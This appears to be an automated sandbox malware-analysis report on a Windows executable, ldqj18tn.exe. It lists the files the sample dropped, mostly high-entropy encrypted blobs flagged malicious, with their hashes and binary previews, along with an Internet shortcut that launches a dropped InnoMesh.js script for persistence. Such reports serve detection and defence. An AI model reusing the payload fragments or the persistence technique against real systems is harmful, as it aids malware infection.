                                              Preview:.o...A....tucp..HQ{.\..,0Y.pQ...L*....d....?..9(.&6.ph....a?.!.U....-l.!......{..dI.].....K........k#.MI.U....9.o.....s.......d.....c.......4W....b........<[..d.^...C..t.P.S|&bO.jQ.N;X[...I.he6..f...l8...#....O...vK.}2K.AV.K...A...w.(.....<P...s.b....h.@..[Y..`F..e.S..;../.h..e.F.r/...D6.`._.8Q..Z.......[..f..P....&.t@....^.....3.z8R.D.....O...{C.o4.Qj.w.J.ua..1...C.c.W.o...c.../.d..5.W...u..q...r...1.K....Y.d.._.......!...~\_1\..09....i.N...z...(.)......d....D...,....e.&y.`.......S.X..0.v..X../T.n..Uy.M..&..x....n.D)G..(....D.@.....2>...}.l......#eE.=...$.+".u?r....k..n.x..7g,.3....i....j.0_...D.lh'.C..&K....?..|..y..'........k.YQ..O..a........D.]&.uP..Z..h.N......R..`.....jo..m.]/..+._:<.....!...........\WR. ..%7Ymp~+.B%.p......f.^...i....9....n{.W. .I..YT.3.b..m.D.h".yW.d.'.f.....~Q#..F....Dii.qm..IB...I.+.%......].I6u&.u&%.l..?.f.(....>Q....&$..|j.H.Y)dO.l&..r_..C."Z.&.'.r...h.CZ.IU....r.......>...>.....%..*......t.`.b.....P.PB"
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):69632
                                              Entropy (8bit):7.997194265654002
                                              Encrypted:true
                                              SSDEEP:1536:v+pxZi1WY75TwdFzkQIfiLiR5fARQvjc9fdWx3L4wRrvTkTppGc:v0S5Jk+QIKirYaQpUx39c
                                              MD5:EFF591562D9AEA14D2872367F7B7103E
                                              SHA1:464E462445DC343E316FFCB6B29234C446D0A064
                                              SHA-256:5482A9A3B48354EB14C55DDB9E2595E79B03615C93464FD0F5FDD6E208AF4F82
                                              SHA-512:C75FA0300B30B71DE261982BE233E41A96E00E0B83FA4A9AD163FD3E740B1A2EFAC99435A1887459F6234F6BDE7ED5D9D53C1B26AE4F0414561A03E38AFCDCDD
                                              Malicious:true
                                              Preview:[..>K..F.`.>86.!.3...........^.....|./.J.CHE2.{..C_...F9l..`XW6.H.....;\...:.b..'..c.Y....>..\.\...vX..6; .(.....0...0.....V.S.J.v.J..}3.....>.}f.7............=,.+Z...Fs}.g%..w.......$..`.S.....z.].Q.s.=... .e@).&...F....%Ayc!.PJ....=.k.x.....v...Y~[....G.....*........T.n...|.u.....M..iA6E(..E.I..yNk.l...,{....(.!R..........H....'.s.Rg<m5w`.Y....q..#,......T.O.94...c.V..... 4m9..m...m[...:.q...'.0......m..........x.....3.U....{....Uvxq..>U...k^fr.$q..a.cr^w.T...A.F.ma&......hu.9.{.a...)....o..,....M.....T..=....j.v...iH.o.09"1...[......-.2..mg..m...F./U..F.T.&..z...r.....U.}.w6..$0fN....!...d..@...u.....c.NY.-.."..m.^.BA.:..Z..,.0..E....e.........S).-....P...Og@]kdRVF..9..p..*.S....~p......=R..vyAN.....n.....X.2...7.F.....M.v.,..t.XH<Yr........Q.=n9Z.P...8f.#:...k ;].wuT....]5..8......-..R.>.u..g..:7B..#2.a....u..@..(.......\...I^.1i\.q.`....QW.e..ga..A..5..,.....e^4!i......I.{3~.S..|.......1Z....9.@r...Y<_.....5.;..9...&.....
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.996765889888764
                                              Encrypted:true
                                              SSDEEP:1536:awFUJIg3MqmVC8RUIvzJb+OriV7i8svKR5L8LXaIBMm83qclL:bUKg3pmVC8Rl+Zt1qIeeoG3qc5
                                              MD5:0B20ABB260FC790E78F84A960314499D
                                              SHA1:631654EB5A843F48D7D4F75A95305CF738A92500
                                              SHA-256:7491C99CCA33B24B2F8BD2EA72561D60154E51142796C28A46D32C2DB5E972B1
                                              SHA-512:6CA15FD999A40CF37AF80A2BA79A5ADC45F997D978B8051CF3D0C858AB26C2DED9D6CFAEDECAE1DDAAF1AFCEE2B9B72FF6E38064B8AECEF3BD4AC4314BDAA43D
                                              Malicious:true
                                              Preview:..Zp..uz..>.-.N..5.../.$l.S.`J..(..-D..0.~......$p.RT..5Y#.M.[.F.i*...S.nf...4.X..{.M....%.....JD...nN.C.k.?.A&.c*.....x...r.Z.S....pu.2.AKR.m\..\;...1.w..+....z..$..b..Q)..gyfhW..8......./W.......zBj.{k.9...;.....k?)...an.q....C.ms...@..^..L.W......b.d.\.......x........U.\h..T.l...o.&..u"...[3?.P*3@.H..'..'X..!.DL...t%.8X[ ..r4..DM{2j.U..1.O.......5...Z.Z.$../..u..`.C.S... .n.....a...K..\e2................nyv....'A...14..O.I./L......c...f}....t.r..~G)...^E..^F...l..;3.>..&RV...@..e...>.....Z.E...5..6.>R<.....!...3....a..qWs59.*....K... ....<.Z.d.d`$..w..0.C..<..^&..X.:.S.....Y...\..../\..../.ZDC....9..=@.>O.#.......,l.n.....V...J....R............+P`8m.D....TU.=.....<v.z],.%.../b..>R..kf..2.z..D]SH+6X....a.t.....T.....7U..l.$.%..M.t....?6..{.i~.E..*_P..o...A.WS.g.....o.........U:q...+2...+?..;.9]H.{y.......P.{QL.......Fl...^M...?g......]....7.th}j..Z..l.......6.\...C.b..<..:..B..G.....VC..%..P...O..........dr..Ad.#.$.....Cm
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):54272
                                              Entropy (8bit):7.996455408231238
                                              Encrypted:true
                                              SSDEEP:768:872ws5O3wKoSCM0ZV4EdtkFb5iezgE6kZn3RKcZweWZvNB+0EQuHmEchpW77Q2xB:C2xuDVC7s4eIsnB5ZwbNNsOEq245q1b
                                              MD5:24548BC705858B908DF8590C42555E34
                                              SHA1:DC16D01B52B94E0BFA33BF8124F8E55ABE1720A6
                                              SHA-256:B15854B830337EF3DB8458995B59B02037839D4C7D2EEB69124344E29AE77671
                                              SHA-512:F3C5D612BE5784B73255F5A0380E38FE116BC39D3B261582CB748C91CA098AD02D25DDDEAA57216F0B7E30589F3FA296E2945D8C4A3C04CC347AB0187EF08834
                                              Malicious:true
                                              Preview:...k\}.i.[o&....`q.!a...{.....,!...Y;.r..D.....!!..=.G=..C.6.S"s...V1..b..J..=9.;C..M.D...qA>A/Sr|...!.....g..s..#........YU.1...t......".T.......2/.......GA....'B3.k.....U>.KQcd.`.]LtN./....m....e3..Jf.]....g...(7b.....~.{.........".....W.M.4..W7...~..Q....h..=@.q....p...2v"...9.u..K...wB....."~...s..G.1.`...7#{a..... U[Y:!.......4N61.}...:.\.[..jgm..f.|&...%....#.y.c..LV....../O......N#.....u2..$}.P..{].....,./....y.2......).R..@X...e....3......o.<.k.K.X....".h.R....Kd..iq.~C9.'.XS3.D{.hp...."...]]D.... |7e.2..(.u;.W.&...~-.:w...a...?.>.......D...UX......C........I.-...s.....f.IJ".x..6K6..!....s..hK....m+@....y...U".b........km.1...U....`..>!x....4...;.O..Ov|....>Qc.br..yq7....J.j>...m...i...Ou..y....W....u...s!V5.i.o.dw...1..g|..G%.q3....\..M............5.Y;*].c..N[....4EF...9.S.)...\.N.{n..A.]O..$jZ.*~aG..R.s`,.@...J4.B....=.@i.;..4..)m.*..d."g#......I...?...G.D.M.V.2..(n@J..:.T=....vk.q+...s.wbX...J..S..1.J.&...,{..K].l.x...
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):101376
                                              Entropy (8bit):7.997914373248418
                                              Encrypted:true
                                              SSDEEP:1536:1H16MKOSG3fStcKwt97Fr6dj4go6KzouYbHYqEVSBjAFYI26wf9kp9ZB2lyDNumy:PxaG3atO77FedscQcYLfYN6wM7PO8E
                                              MD5:25AA98D5EF3952A5A0BFF32301C09AD8
                                              SHA1:569DD803FC9CFFA01C159C650648A3F627635000
                                              SHA-256:3377FF0A28AC9AD8BA3C164CE29503AB3E4BE2632978BC519859B59B3C9E6A16
                                              SHA-512:5C260F85F498D04E8F9CBFDF63521A86D69E8E60F2E5971CA3F95559B444B791F3F47C403D84193FF84C962214FF57ED9D6710AAA4059F78406AB220BC23371E
                                              Malicious:true
                                              Preview:1..{.XH..{6-.qr8...Y.BD...C.5.Tw...r....r}......s.Y...Y0h...{...M..86..48/...y.|.`0.T.R.f.u-..u..d/. ....t.W.xM.?..I.p.=...i...|.6...[y...\..=..lu.Q...wl.a....".....f..e....D.P.&|D..9._!.#T...........QNq...k.Y..g..z.G.5..[j_.U.D./..`...8p...LZAvl(A{.P..KE<jJ.F...s9"p..6.m..U......"..f..&..a\...?.\.2...}......6.0....R%I.4...0..c3..v.$.x.....).LG..v.....B?.x1....t9O.4}.?.d...+.1..1..B/0b.hFqv..,Y..K3S...<...............^.q..2.N.b(..s.%..w..W..5..Nl..'<.P......#.....T.......2.....G...d..G':....c..QG..x..9.V..........V....S[..m.XX.ONm..pu+^.<.Y...:Z....*....."{.I......B.p...Syl.....L<J..2.v]N.El.Q....n.>..B.../.a..y."M...........?I..<.U...(..."....".%..z;.....q.v...M3 ..s.;.$x...)HfW"pw.`@.UL....h.."b.z.....p.{Qs.......SA.>kw..h.e>\..G.._.....2.I".1l2..x.|.V.n..T......E.(..+"M...4.d?..>..t..)..{...U.+.._4)......+...~Ak.T..Wh;u..>?e{........|.....]...m|.(U.ZD...e..J..p.Q7Q*...E.".;..: yin(.ZF.K).$R.......pD!`..^.F'|....Q...MX0..8@...5...c..
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):61440
                                              Entropy (8bit):7.997269818226767
                                              Encrypted:true
                                              SSDEEP:1536:MXrI/MNgZ4Og0Rjihiu9qxwil6DIFcNZe:MXrI/fKYo6eZe
                                              MD5:1C80BC738D8205B5D4C2B2445CBB31F0
                                              SHA1:253BEC88BE97A71788D6152908CDBA73E55B46A3
                                              SHA-256:492E8EE10FE8D95577C96FF4CE184DF20560207DF7D1631948328B960434FA61
                                              SHA-512:1F299A0C55197C780D65D00909447EBCD5703EF9426AA6844C2897D572B3AAF555C2ED20C5BBDA965C8B25232F5A79DCF749417DF7915A60E6621DD1E16BF6EE
                                              Malicious:true
                                              Preview:..:d^n.q..M#l...L..~..{..I.h..7......z<.dd>....p.....n..)7..3......;.N.&......C.........Z*].Q.k..$.......l.\..s...w..T8..|..h..Xf....8[...O....gpr36b......&..=....LE..X...e.9G..d|i+..5.......M..R.........0....m.u..h.................mT......-f(4...b..k..k.RnaX...[!qA.(7.......7c..=...~2..K.c;......^Z.?..zT..(.$..F.at....^...0.~]`@M.......X......y4....\..j.)..b.ft.40G%y...5E.a.1..$.r.D..z...P.)....^..Qy....WE.l....G.44.8.pc..N..H$..Q..V,S../m+../.L.{....s.v!O..5xKG.K....!.r..;.....S.U.R.'3f...%!.6rB.R$S..J.N.........A....v.o.S.(.B../..y..gq.D.....4..D{...^.\...N&J.._.Or.....S..p%aX.F.*t.C/...Q.@...b.(..%S.....R<8uj..Y.q..@e].B..u..z...nf.7.~yt!O(...$..".qpMu.~...5@..k..-.E>.5..7u........R..e..>.`......N.B..7.3.@vh.[c..<......q..v..s......8.....~.5..=.{..~.W6....~.(....5.t.F.....3...?.]..9.h........N#u......wBa:,.6q.n>N..".Ix..>"..@z....?.......%3..X7....y....'d.A..~...F.W.....@..........J.V.......dz.....5.S...{..W.....+......8.l..O.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5636
                                              Entropy (8bit):6.0876490146743425
                                              Encrypted:false
                                              SSDEEP:96:kfkxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H034:smHAeOqAFDw09CV/2nPvj6DdMP3r1HI4
                                              MD5:598774EC6001A83BC8A24565E2A908BB
                                              SHA1:503438709CF002913D96E2A7EF51325B0605A64E
                                              SHA-256:79749AF598CD4506AD7AEFE35BA2CB8AC24CE4961E225E5DF345A95304AF1678
                                              SHA-512:0BDE914E7AFA80DFCEBA929C53C239FEAF0C21200C245D606CFFBF8E9AF1525F57B21E96F003DC4C4EC29120C641598CEA6EFB51530D542C83B989202E31A670
                                              Malicious:false
                                              Preview:MARTNMSPIDERRINGTONE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):87040
                                              Entropy (8bit):7.9979586106795955
                                              Encrypted:true
                                              SSDEEP:1536:1w4kfylR3M4LxsCKKb5y+IWYzr0V0Ni6NNq6wOydrqcSusn+WLjkZeYctHeYIlhk:1/kaozzKNy+6PBhzwOGrBsn+WLjkZeu4
                                              MD5:7B0DEE84D05813B43B680C8FEAED52DF
                                              SHA1:6831401C9BDB63B42E6AE66B5B3A619A81BC07F4
                                              SHA-256:CC15CDF080BFC8C16B669782B545C9FF15633ADA54809FCF6BE8311E1EF684EE
                                              SHA-512:921D7B873A99C0665F32AAC000CEBBE3BF6A0D9CB8D82E6305083EFE57023971613EBB32956476DAE3ED7DCD71C7796F75D12A1840B1928845E47AA3645211C9
                                              Malicious:true
                                              Preview:6...G.....MO..&2..C".j..)u...7...p..E.(..NO..B..VljU..w7.#t.B)H....;.l...g..J.n.siJG(et..01V...A.A../!...b@WUd....2..T.."@..E.U..........P.0......d...Z....TJ....i....qa~...^'...9...M.-Z..>>3.l..3w>..70...........>.F`.....g5p;Ex.6.9.Q..6.....S....;..>..~.7..O...o..a.f..E&.GdD.....-R5H7...G........6...J....6H_-.4..uo.LQ..<.`T{..]r..~.u?!O~.....C......wt..g0u,Q...E4..d..?mq~...z.C>>\.....c..L._@j........9v.P.9..qh"..A..4&;.2.j...n.%...eK.|.$.z...+s....H.a..u.....u..m.YM...o..3...P.,M.........]...58.2....@...E,...[...Q.+..HU..'.<....i35-.wI....6^...=.s......0.0..-...5:.]mx.c..R....0.Y.e(8T...0B.....l-..)G.....K.@...e"..fc^D.}...YCo...`.Q...u....C..I._.^B...h....3.n...E.h....r.......x...-.cmY..a}..Y./..({..,g>..I.......>..U.B@.<$..<..V..}8..g.....a../O.[M.8.....e..r4.=.O.[..Ln6.M.{..c..?...^._....q....GGI.v..Z.........?..c.r...b}..*..V.b...i.=jF...M..".)..&......u!T|...^..]f. ...\....1Q.3.Q.....R.........PLb...t..C..r...M.y...]9...(.d.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.99700719991649
                                              Encrypted:true
                                              SSDEEP:1536:kSgReDsZ2S57pfLb2Uf5c5saqKuvaRt4pn/GoUVjSoKgLWmHjJlym:kSZopbSpqKuk2puHgoKgLBHjJgm
                                              MD5:C9E306D19DEF703774D08975E553263B
                                              SHA1:8AB1DE74C5C1A45ABB93D0996C6D58F1530D4A4D
                                              SHA-256:E2CC14D5C33F5A9799D81683F017914C0C568FF4F634D5CDAA69DC086C01F88E
                                              SHA-512:8CEA19182FCEEDF07C81A7E5C9ED35E17591484C7BA4728EC65737E7E2ECFAFD288E656E036BF74E52E20EDED358223E058F5DEB8D9FF435EFB1B00FD94B51BA
                                              Malicious:true
                                              Preview:...._....Y.n..k<.|.....JPU.?.<a..2.I...^...z.Bs7.H..)...).W...!.~................4jF.......z...|...c8[.v..3.)g. .........i..sy.......%6.5........8.a.|."...*w...p....v.(...@.F.|..8.....Q.....tD%...".BL.;...@.........9.].ud.ya.....@....{......O...w.fB.zO.-....A..O.p+..-.....#?.....M.7L.9..zx.Q=.n..K.a....[...=...{.u....2.?R&(N..........(.1hZ..R...4Q +.K..y-..S..'_'d...1...........oHw.........6..a..."......x....g..l...V52.~..1..u..>r..^^.k....:.q....(..L.jI/..E.....<QD*8J..1V6.9.r.F..Z@.....-.C.s.xD...7.*:...Fzk.n......^i..D.....D.F.|J.....pP...G.CG.U.QL._..v.Yj.*.&."J.&.o.jK.....=!.yRo.3..;.G..U.p._...V..t...@.[.m.'.a.I$....1..8%.;=...z.3.....0.:PtE........l.fA;....^WL%.$.AK....Y..5<S...)! .,D.1.f..?K ..O..Re..P..:...Q.....)s0....Y...d?.>....}K2.......Fnl.x.|...Y9.t.{.....3.......d.H.~...9Z}.0..Gz4..v....+s..C:.<..*.W.....L....A.....I.!+.K).&.%....)...>.hN....x.r....U.. ....4.gO?......h[..U.....F..."t.G.b.....(Cv...>j:..K.]...C.
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):53248
                                              Entropy (8bit):7.996397386083232
                                              Encrypted:true
                                              SSDEEP:1536:VDObOdYwNIGtwKnEscdKdnZ715rJVe6LODXFxLU:VDNdE4w6KC35DeXXFxQ
                                              MD5:26BFCB75C4F0FF69CEDE2EAEF6CBEC06
                                              SHA1:41D437AAAC0ACAA0D98C4FDA6586A61979B25F13
                                              SHA-256:7BE8B9F51B43F525D0140EDC5502BE3A6E7BCBD876DDDE442FABAD43B6D19B36
                                              SHA-512:126740665893FC6F775A8BF31CA7CC243CFE26A84A61752BADAA684DD156E08D6F473AF7F0C9796A8062C8A67AD873B0AA9DFC44679C84C4CC83ECFB63317381
                                              Malicious:true
                                              Preview:{./1.Z6....L_XQBe6w..H.....a..L0..sMoTt.sa.X=..e.R...........v9....B/...tX.q..A..c.39.....J.T.?^w.Z.Eg.H71..M.oN.....-8E.....W .....b.u...).D..-e.4....{.0..Afd..y.w.9...0... ......Z .1...zw..J9.z..r..ZrB......n.V.;.8..}.N....y.PU....*AV...'..Q...g.......v..=v8.Q....u\u..J.KH....1...*-....'.v.{.[.6..luS..kxvjx.-K.o.4:N...Q...R.2.Xi8.A..q..W...T..Y#....1......n.:)..~...x.fX...Q..v.X......Gq..$..1}.).e.N.W.v...A..Z$.2...$.L...)2.......Mj.Mt..z\h<....Or;..b...X6;...+?.M.Xa.5... .R....1l.|.A.<.;....N..i.......k.W............=..e...5......>*.c.o....:.6.FU..%...`M.f6.$...9.J...3.........D.....=HK.~.sec.D..0T..$..?....d+..4..h..u.Z...X..h+^.*......[.*C^p?[......v..a..KW4.....@"..T.ki..."...a|....z.7..c...q...\t-C..eV..[..<....V.x.C.n.|.X..b1.z.CL...ns"e.!...../.6.-).....^..KX.O....Sa~r..v..U{.$.....p.?z.M..:....<..`...e.l.UG.`L..A.3.?.Y.....n.?.t...!NUw|.F.G..x...I..B.}...l...H....q..)..?l.Y.h$.w0\XvZ.....y.[....!e..}....b/i..H....n...;....'.Gy6i1.:H>.*..-
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):97280
                                              Entropy (8bit):7.998052732299105
                                              Encrypted:true
                                              SSDEEP:1536:Ni5X/n8JL88Im4dSgQ3QDLTTWWzDO2Phn3TYXY/EuESYwOOJltjb2It6rc8/NyS:NMXf898Fm4d6ADnTBzD1P2I/ECxLJlxi
                                              MD5:2B1531C3961A12A05168DDBEC6DE9351
                                              SHA1:BF02E49064C0B97400F5E54A588D02B584D0E700
                                              SHA-256:6A1F12DCAB292378358F48014D0078407B2A141237BD7B318A83539497346FB5
                                              SHA-512:5DB2C782FC950BBD409A551BBA32708A5A22B78779D92DAAF9C56B73B94CA8478493B15784FDE711292E87399A06C51D5898179E4B5302A0531492F330F73C57
                                              Malicious:true
                                              Preview:K8HH...T..P..+..z...t.wB..gqa.XiaN./.,.*8%.u...(.l.L..I...z.$.d......i.:.a~.V..!.[w....0.).._..x.g.b...f`{4!p" ..&`.P.C!..1...o..m..;...[-.<.?>o.p.m.....z.{yAR.....L.^aQO.N..._9...(.......;St.:.....8...%D.Qq..Of/p............7..v..J.h.m......................^.2......Z.#.H..<...G..l..Ab).4..e.|.......u...}.>.X..i...M&C..{-.....w.j+.,...hR..mGT....Ou.....,j.!B...@k..A7.y..T.....'d.`.=.B.(.}U%..H..^.......e6.4.....qz..25....u.....=....|.nOe......b#..]....^.Q.@...........&\~%..D.e.Cy;.'.T...w&H...f...*hl.OJ.....j...+.a.!.Y.[..q.E.....%j%u@.c..,L........}...b4...z".OG..^a...=...v...e.......^...? 7.DuZ..-.A..&..3.%.H...Z....P....A3-.?.[.}...7.a?..>.g[......e. .&*....c..e...N.0.\.z.m....,......_#.7..P..:9C.......N0....;.W...c.5.9.....r.....8..@...K.....9mK.}]".i..iNb?^L4.T.+...i........d..N..n]..0......./..GQ.....Uc....Q}.....4.VDq.Y...5......9.BRb.+.fgT...O........<gS.ImRe?@.x.....I..ZV..(.8..`..{<.2....*..\...,..)w...9/.q.>..~...n*..
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66560
                                              Entropy (8bit):7.9971208270762375
                                              Encrypted:true
                                              SSDEEP:1536:otshYdm8KllFFnGuyxeOFGpQMpItjKYvvOfPWE:qmNllvgLGpQhDvPE
                                              MD5:91880DAFDBDDDD3A7BECE82040731293
                                              SHA1:B2D53F9DCB1D79F5CAE8B20604CD22DAA223287D
                                              SHA-256:30B0CD78DBFB69528322CBD789347159AE4756A7667B889FDEF022ACC468A658
                                              SHA-512:FDE9B03522B27033E88371270D4491DF43A5B347F20221E7932548E9565BCDC08A8B7294C62F5CCDE1AAB0236061E13D675B3D1A213CD79384FC1E50ABE46B82
                                              Malicious:true
                                              Preview:..[.m....!.U.%....[.-...m.=D...6...(E...&\.....'.x.G~Wp.[.2v....Qo.73..........?F..`.@_...4.!..t.4+..ch..H;...~dd..7.|......@[.."........E....\>...l.#..PEG..L.$.,..[A..k.,.?1A(.aK.&...p...'Q.^....m.}..E..v.)s.f......).h.....}<x........c...q..1\+...k...j..Q.<a.f.3..]US...J.=&.|......1?.. E.ne/..#........}.U_v........%.#...'...D.,...S...u...]...2.-.....l./...%OG.....O.jq...d+.L.(G......4.|...+".XF.G..t...}J.s,....&....zF.y......R....i....3U...|.y..+.}.. .......7.Z.W....6......t..P.m..+..]D^...|.a^...#..`.*...s......z...V8$Z{*.\].GX`.......e..v.@..E^.."k.s..S....gd.16&`........-K...W!....S.X.....5..c...Q..6. ..q$...1;........\u.sws..........i.dva9.L..D#........T.1.K.......E....L...HX......x..........(....nm....*P..#.p.o.q...&..2...a?.IO{]..G.)gQ(...U...:v..Y.a...0.....0..B..F.:.e.j.?v..Ha..<Q...@.i.m..@P\'W...........`.:..R.jMb.-.F..qn...i.".C].z9.....R.O.....W1.=......L.7.....qiR....~........9..I.....S...f6......R....e....".
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):7.997070878978732
                                              Encrypted:true
                                              SSDEEP:1536:8cYTYhic0cJIiMbRTPZBQD3z7nYIDoncF8OZ3ChB:8cYTY8x/OgIsciOuB
                                              MD5:597F565834790C594B894C61459C3DFB
                                              SHA1:D47C91AFE8F194C45055622801148DE7D83A3907
                                              SHA-256:91A36419B02C0BEE19EE66AE6DF90302AC6B64BD15D1DB74BC6682DCC03CBD17
                                              SHA-512:2AFDB76CCAAD9995317F53886B638800743D88B8007D89E47B45706757BBA421A8C1624592E64FFB73520B5BF26D5AC4A68CD2FFE7A4F5E8ED27F943A2DD5AF6
                                              Malicious:true
                                              Preview:,.9...S....~vZ......e.l.c.*.s.2O....$.-.5.`..StW...O.r%Ys.....7~q`=n..,....1....6.Jo"(......X6 ..M..Qb...B>.&.v...d..........y....C...3...;....I..'C.......n..N.4.2oc{l;.!....c.Hr.B.....nJ..\.7.2~....BV.TS3R..C..;...i.4..LQh..+I....Tm..].....(..9&!<.rA.w...(....1.w.qV.[;...hO...z.F(.`..s{.&?....[.5;....d..<.............._.V...,.r....i..u...^&NT..45.;t..C.+..S...;...-..|..S..!..s.N.Q+-C.5.....}L2<.._.m..|nB.....Zb..R.1b$...`..E.6...1..A.g...c.\/S........&E.A .*!....8..a+....T..5yM.z..CP.+..b....i.{q.....9.R.L.!..r..n....T (zI.R..w...f.......k.).7..l.W.~....<..5..N...S....J.....?....93eX.@ ..8..y~.......dGb.q.{.S..J..!@.n.cn......J..U...C....N.M.l...>.|...&.......1.f..)Y.b.._+.....'....v........G.k2.4[...........Q..2Ch....\.Y..Q../.H.O..ts.h...~..=...>~.~.\:....GE'0Y.kn......LU....o..ZJ..).J;..[pmR\..d.c,.3.=.o....g..Y!W-..^z.L.{7.E^9u.{.P.8.j.......T.>.-...m..2..*...N.. ....z...y.]........c....>..%..............3...A.....V+..........=lc.(
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):887994
                                              Entropy (8bit):6.622324410902026
                                              Encrypted:false
                                              SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                              MD5:480B699995A5B0B846D54973B83DB3E7
                                              SHA1:92241BB78A7A8769719D0045621C853F628F9495
                                              SHA-256:8615162D4D1718863A131FF5E242884922AA463FE2D6B48BD8CEADD9F519CF5F
                                              SHA-512:83495FC821564E92C90CBDFF7C7F52D6AE6A9367C9845312231E84D0246110E095358EAD78427F4A6AD9A7276D4CEE538C7C753876FA087C8918B24C1CC1A176
                                              Malicious:false
                                              Preview:.}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):93
                                              Entropy (8bit):4.827604747376041
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5xAGNohFMhWlc:HRYF5yjoN723RNUFMr
                                              MD5:7973A84F1A865BCBF0BCFFE16D530DB4
                                              SHA1:3438A33D10CB3BD769A7300DE75149883E61FE67
                                              SHA-256:A025CEBE65C49004A971DC9D0258C293CFAA25E5F151E497021D6F410B376620
                                              SHA-512:BED078255DB647799DD8E9EAACF5EE225110DCF8982214D75BB048A690215BADC3D744633C576553425935711CA6C0F24DA41BDFA15DD1AAC8515548194F4CAC
                                              Malicious:true
                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" ..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.988870164236672
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ldqj18tn.exe
                                              File size:1'656'911 bytes
                                              MD5:574ab8397d011243cb52bef069bad2dc
                                              SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
                                              SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
                                              SHA512:c3e3f7809e5540bdd59a0cd62e0c718aa024355952f7062aac9eb4b7f40009ac97072962f9799a2dd4e2194e7a8d4df8dd4636306ecb7fee6481f6befb684702
                                              SSDEEP:49152:iEVxqQJAyCoZxV/yPHZIQDjLO7MFVrbMwjK:iSxVJA7ofVGHiMjCMFJAwW
                                              TLSH:5375338CF9972D12D68E2BBB613291505BF87D7704B6D4EBD705D81EB23629028CDB23
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                              Icon Hash:c1c0e4ccdcc4c4dc
                                              Entrypoint:0x403883
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
